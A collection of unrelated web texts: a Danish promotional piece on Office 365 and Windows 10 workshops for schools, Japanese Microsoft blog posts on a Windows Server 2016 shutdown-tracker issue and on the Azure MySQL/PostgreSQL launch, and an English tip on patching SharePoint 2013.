Hvis skolerne skal kunne udvikle praksis og gøre Office 365 og Windows 10 til en naturlig og brugbar del af hverdagen, også når vi er væk, skal de have noget at arbejde videre med, så de kan skabe en løbende progression. Vores tilgang er praksisnær, og vi skaber superbrugere både blandt lærere og elever, som kan videreformidle og oplære alle andre. Vores flipped classroom undervisningsmateriale***, som vi bruger på workshops, gør det langt mindre krævende at udfylde denne rolle for superbrugerne, og vi klæder dem på, så de står så stærkt som muligt.

De resurser, vi på denne måde efterlader på skolerne blandt lærere og elever, kommer bedst skolerne til gavn, hvis lederne også er med. Vi går altid efter at sikre, at vi får skolelederne i tale. Kender de ikke til de muligheder, de har i hænderne, kan de heller ikke udnytte dem konstruktivt i det daglige. De skal kende til mulighederne i Office 365 og Windows 10, men også hvordan de kan bringe deres uddannede superbrugere blandt lærere og elever i spil både som rådgivere og undervisere af andre. Elever og lærere, der hjælper andre med at afprøve og udvikle brugen af Office 365 og Windows 10 i samarbejde og undervisning ved hjælp af vores materiale, er stærke kort at have på hånden for skolelederne når implementering skal ske løbende i skolens praksis.

Workshops - Show n’ tell er død!
Vi ved hos Hippomini, at den traditionelle IT-workshop, hvor underviseren står og gelejder en forsamling gennem fx Office 365 klik for klik fra smartboardet gennem såkaldt ’show n’ tell’ ikke er effektiv og sjældent en god oplevelse. Differentiering er så godt som umulig, usikre IT-brugere bliver utrygge, erfarne gaber, og alting går i stå, hvis noget driller. Når tiden kommer til det allervigtigste: At tale om didaktik og den værdi Office 365 har for samarbejde og læring, er alle trætte, og den allervigtigste diskussion udebliver. Derfor går vi til det kendte workshopformat på en langt bedre måde både med elever og pædagogisk personale:

Når vi holder workshops, bruger vi vores flipped classroom undervisningsmateriale til de tekniske færdigheder, så alle, støttet af vores undervisere, kan følge med uanset niveau og kunnen. Dette sætter vores undervisere fri til at hjælpe og sparre på alle niveauer, og alle får noget med hjem. For både deltagere og undervisere er det en hel særlig fordel at have roen til både at hjælpe dem, der er lidt usikre, og dem, der allerede er i gang og måske har brug for at lære noget helt nyt, der ikke lige er på programmet den dag. Den frihed og ro er guld værd, når der skal snakkes didaktik og brugsværdi gruppevis og fælles.

Vores undervisningsmateriale spiller derudover en stor rolle i forhold til kapacitetsopbygningen. Vi ved, at det bliver lettere for alle at inspirere andre og videreformidle tekniske færdigheder med adgang til det, og det er derfor en vigtig brik i den blivende kapacitetsopbygning. Derfor ser vi det som en betydningsfuld opgave at forankre vores materialer og metoder.

Merværdi i forhold til samarbejde og læring der hvor man er...

Vores overordnede mission er, at Office 365 og Windows 10 skal give mening i det miljø, hvor det skal bruges – uanset om det er i undervisningen, teamsamarbejdet, på kontorerne eller i hele organisationen. Det skal give merværdi og ikke være ’IT for IT’s skyld’. Office 365 og Windows 10 giver mulighederne, og vores rådgivning, kapacitetsopbygning, workshopformater og materialer gør det muligt at bringe dem i spil og skabe en progression, også når vi er væk, til gavn for samarbejde og læring.


Windows Server 2016 で “Network List Service” が無効化されていると、起動時に毎回 “シャットダウン イベントの追跡ツール”が起動します


Windows プラットフォーム サポートの秋葉です。

今回は Windows Server 2016 を起動すると、毎回以下の "シャットダウン イベントの追跡ツール" が起動する現象についてご紹介いたします。


Windows Server 2016 で "Network List Service" サービスが無効化されていると、起動時に毎回以下のように "シャットダウン イベントの追跡ツール" が起動します

Windows OS の既定の動作として、シャットダウン (または再起動) の処理で、"Eventlog サービス" が正常に終了できなかった場合、次回の OS 起動時に以下のイベントログ (ID 6008) の記録とともに上記の "シャットダウン イベントの追跡ツール" のダイアログが表示される動作があります。

このため、冒頭に記載した現象は、何らかの要因で毎回 "Eventlog サービス" が正常に終了することができない状況であるため、毎起動時に "シャットダウン イベントの追跡ツール" のダイアログが表示されることを示しています。

に既定で存在する以下の "Network List Service" サービスのスタートアップの種類が "無効" に設定されている場合に必ず発生します。
これは、Windows Server 2016 で内部的に追加されたコンポーネントの影響によって、"Network List Service" サービスが無効である場合には、シャットダウン時に行われる各サービスの終了処理が正常に完了できないことに起因します。


本現象に対する回避策は "Network List Service" サービスのスタートアップの種類を "手動" または "自動" に設定ください。
※ OS の既定値は "手動" です

"Network List Service" サービスのスタートアップの種類を "手動" または "自動" に変更する場合の手順は、以下の通りです。

1. "Windows" + "R" キーを押下し、[ファイル名を指定して実行] を起動し、"services.msc" と入力し、[OK] ボタンを押します。
2. サービス画面にて、名前が "Network List Service" を探し、右クリックから [プロパティ] を選択します。
3. Network List Service のプロパティ画面にて、"スタートアップの種類" を "手動" または "自動" を選択し、[OK] ボタンを押します。



MySQL および PostgreSQL 用 Azure データベース サービスの一般提供


執筆者: Tobias Ternstrom (Principal Group Program Manager, Azure Data)

このポストは、2018 年 3 月 20 日に投稿された Announcing general availability of Azure database services for MySQL and PostgreSQL の翻訳です。


このたび、Azure Database for MySQL および Azure Database for PostgreSQL の一般提供を開始します。これに伴い、組み込みの高可用性、99.99% の可用性を保証する SLA、弾力的なパフォーマンス スケーリング能力、業界最高レベルのセキュリティ (英語)コンプライアンス (英語) を備えた MySQL および PostgreSQL を、Azure で多くの皆様にご利用いただけるようになります。

2017 年 5 月のプレビュー開始以来、Azure の MySQL および PostgreSQL では、数々の機能やサービスが改善されてきました。32 基の仮想コアまでコンピューティング能力をスケーリングできるようになり、新しい Memory Optimized サービス レベルが登場しました。また、柔軟なバックアップ ストレージ オプションにより、アプリケーション パフォーマンスに影響を与えることなくコンピューティング能力から独立してストレージをオンラインでスケーリングできるようになりました。ISO、SOC、HIPAA などの業界必須のコンプライアンスに加えて、2018 年 5 月 25 日から施行される一般データ保護規則 (GDPR) にも準拠しています。これは、世界 22 の地域で利用できる真のグローバル サービスと言えます。現在も積極的に提供地域を拡大しており、今後数か月以内に 40 を超えるすべての Azure リージョンで提供を開始する予定です。次のビデオでは、Sunil Kamath が解説する MySQL および PostgreSQL 用 Azure データベース サービスのメリットをご視聴いただけます。

「Azure Database for PostgreSQL は、まさに当社が期待していたとおりの製品です。柔軟なサービスで、より多くのアプリケーションをユーザーに配信することができます」

須貝達也氏 (日本ユニシス執行役員兼 CIO)


このようなサービスの構築に成功した大きな要因は、Azure チームとさまざまなオープン ソース コミュニティが協力して取り組んだことです。米国、中国、カナダ、ドイツ、セルビア、イスラエルなどの世界各地のマイクロソフトのチームが、グローバルなオープン ソース コミュニティの多くの人々と力を合わせて大きな成果を挙げたことを、心から嬉しく思います。これにより、オープン性を基本方針としてコミュニティと協力し、オンプレミスまたは Azure を問わずユーザーをサポートするというマイクロソフトの方向性が正しいことが証明されました。

11 月 15 日のブログ記事でご紹介したように、マイクロソフトはコミュニティと共に Azure サービスで提供するデータベース エンジンの改善を実施しています。さらにマイクロソフトは、MariaDB のオープン性を維持したり他のプロジェクトの成長を促したりするための基盤の必要性を考慮して、2017 年 11 月に MariaDB Foundation に参加しました。数か月以内に、MariaDB データベース サービスの提供を開始する予定です。限定プレビューへの参加申し込みはこちらで受け付けています (英語)。MySQL と PostgreSQL に加えて MariaDB 用のコミュニティ バージョンの Azure データベース サービスを提供することにより、Azure、アプリケーション開発中のノート PC、オンプレミス環境など、データベースを実行する場所を問わず一貫したカスタマー エクスペリエンスを提供できるようになります。

これらのサービスを支えるのが既存の Azure の技術です。MySQL および PostgreSQL サービスは、2010 年に構築された SQL Server ベースの Azure SQL Database のファブリックとインフラストラクチャによって管理されています。自動の脅威検出、データベース ワークロードのインサイト、自動パフォーマンス チューニングなどの重要な最新技術を備えた Azure SQL Database は、業界トップの完全に自動化されたデータベース サービスです。MySQL および PostgreSQL 向けの Azure データベース サービスは同じ基盤を使用して構築されており、類似性の高い優れたエクスペリエンスを提供します。

データベース サービスの改善や機能追加を継続していくために、マイクロソフトは今後も Azure および SQL Server の技術開発を進めてまいります。

最後にご紹介するのは、mysqldumppg_dump などの既存の Azure 移行ツールの代わりにすべての移行をシームレスに実施できる、Azure Database Migration Service (DMS) です。DMS を使用すると、移行中に移行元のデータベースの運用を完全に続けられるため、アプリケーションのダウンタイムを最小限に抑えることができます。今回、限定プレビューとして、Azure Database for MySQL への移行時の DMS サポートを開始いたします。Azure Database for PostgreSQL についても今後追加される予定です。MySQL 移行における DMS サポートの限定プレビューに参加をご希望の方は、こちらからお申し込み (英語) ください。

これらのデータベース サービスをご利用中の方に役立つリンクをご紹介します。

● Azure Database for MySQL

Ÿ● Azure Database for PostgreSQL

今回ご紹介したデータベース サービスは、以下のページから使用を開始することができます。

最新のデータベース サービスを皆様にご活用いただけますと幸いです。ぜひ PostgreSQL (英語) または MySQL (英語) の UserVoice にご意見をお寄せください。


SharePoint Tidbit – Patching SharePoint 2013


Hello All,

First to start, you will have the following steps: 

  1. Apply binary to all Servers
  2. Run Upgrade-SPContentDatabase
  3. Perform PSConfigui.exe on First Server (Pick any server it really doesn’t matter)
  4. Perform PSConfig.exe on the remaining servers

For the first step it is better if you can stop all SharePoint services on the server as this will allow the binary install to be faster (See this blog for more info), this will cause an Outage for each individual server as the services are stopped and the server is possibly rebooted.

For the second step you will run Upgrade-SPContentDatabase this will actually perform the database upgrade that used to be performed by PSConfig.  I would recommend that you run several databases at the same time across several different servers to maximize time.  And if you are using the correct version of SQL you can use snapshots to present a read only copy to end users while the database is being upgraded, for more info on this cmdlet see this article.  This will cause an outage for each individual database while it is updated, however if you use the parameter -UseSnapshot this will improve downtime by giving you a read-only view of the Site Collections in the database.

In the third step we run PSConfig on any server for the first time, traditionally this was the Central Admin server but the reality is that it can be any server you want.  During this phase we are upgrading all the other databases (Service Applications and Config).  There will be downtime for the server where you run psconfig (Stops IIS) and for those services that it upgrades.

In the fourth step we run PSConfig against the remaining machines.  Each server will have downtime while PSConfig runs on that machine as it stops and starts IIS.

Now that you have read thru that you should check out this script from my coworker Joe which helps to automate these steps.  Do note that the script does not use the -UseSnapshot parameter but you could easily edit the script to use it if you are sure that you are running the correct version of SQL.

Depending on your Search configuration you may want to incorporate the commands in this blog while upgrading search servers to ensure that we minimize query downtime.


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